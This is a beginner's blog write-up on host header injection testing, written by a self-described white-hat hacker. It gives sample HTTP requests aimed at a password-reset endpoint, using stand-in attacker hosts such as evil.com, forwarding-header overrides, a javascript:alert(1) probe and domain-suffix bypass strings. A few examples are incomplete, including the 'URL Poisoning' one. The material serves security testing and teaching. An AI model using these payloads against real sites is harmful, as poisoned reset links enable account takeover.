My First Write up on Host Header Injection Methods

Hi Guy`z I just wanted to share my hacking experience.

What is host Header attack?

The host header specifies which website or web application should process an incoming HTTP request. The web server uses the value of this header to dispatch the request to the specified website or web application.

What happens if we specify an invalid Host Header?

Most web servers are configured to pass the unrecognised host header to the first virtual host in the list. Therefore, it’s possible to send requests with arbitrary host headers to the first virtual host.

By using this attack, we can check whether the host is properly validated or not.

How to perform Host Header attack?

Initial testing is as simple as supplying another domain (i.e, attacker.com) into the Host header field. It is how the web server processes the header value that dictates the impact. The attack is valid when the web server processes the input to send the request to an attacker-controlled host that resides at the supplied domain, and not to an internal virtual host that resides on the web server.

Request:

GET / HTTP/1.1

Host: www.attacker.com

(…)

In this simplest case, this may cause a 302 redirect to the supplied domain(attacker.com)

Response:

HTTP/1.1 302 Found

(…)

Location: http://www.attacker.com/login.php

How we can make a host header attack to a target application?

1. Add 2 Host headers in the request:

Eg- GET /api/reset-password HTTP/1.1

Host: vulnerable-website.com

Host: evil.com

Accept: /

Accept-Language: en

Connection: close

Content-Length: 98

2. Bypass using these headers in the request:

X-Forwarded-Host: (payload here)

X-Original-Url:

X-Forwarded-Server:

X-Host:

X-Forwarded-**Host**:

X-Rewrite-Url:

X-Originating-IP:

X-Forwarded-For:

X-Remote-IP:

X-Remote-Addr:

X-Client-IP:

3. Try to Use Localhost in the Host Header:

Eg GET /api/reset-password HTTP/1.1

Host: localhost

Accept: /

Accept-Language: en

Connection: close

Content-Length: 98

4. Try to find XSS from host Header

Eg GET /api/reset-password HTTP/1.1

Host: javascript:alert(1);

Accept: /

Accept-Language: en

Connection: close

Content-Length: 98

5. Link Based Host Header Attack

Eg GET /api/reset-password HTTP/1.1
(…)

<link src=”http://www.attacker.com/link" />

(…)

6. URL Poisoning

Eg GET /api/reset-password HTTP/1.1

Host: www.vulnerable.com

Accept: /

Accept-Language: en

Connection: close

Content-Length: 98

7. Try to Bypass by extending host header parameter

Methods

1. GET /api/reset-password HTTP/1.1

Host: vulernable-website.com.evil.com

2. GET /api/reset-password HTTP/1.1

Host: vulernable-website.com?evil.com

3. GET /api/reset-password HTTP/1.1

Host: evil.com/vulernable-website.com

Any suggestions are most welcomed write a mail to Akash.venky091@gmail.com

or contact me @ https://www.linkedin.com/in/akash-h-c-4a4090a7/

A white hat Hacker...!!!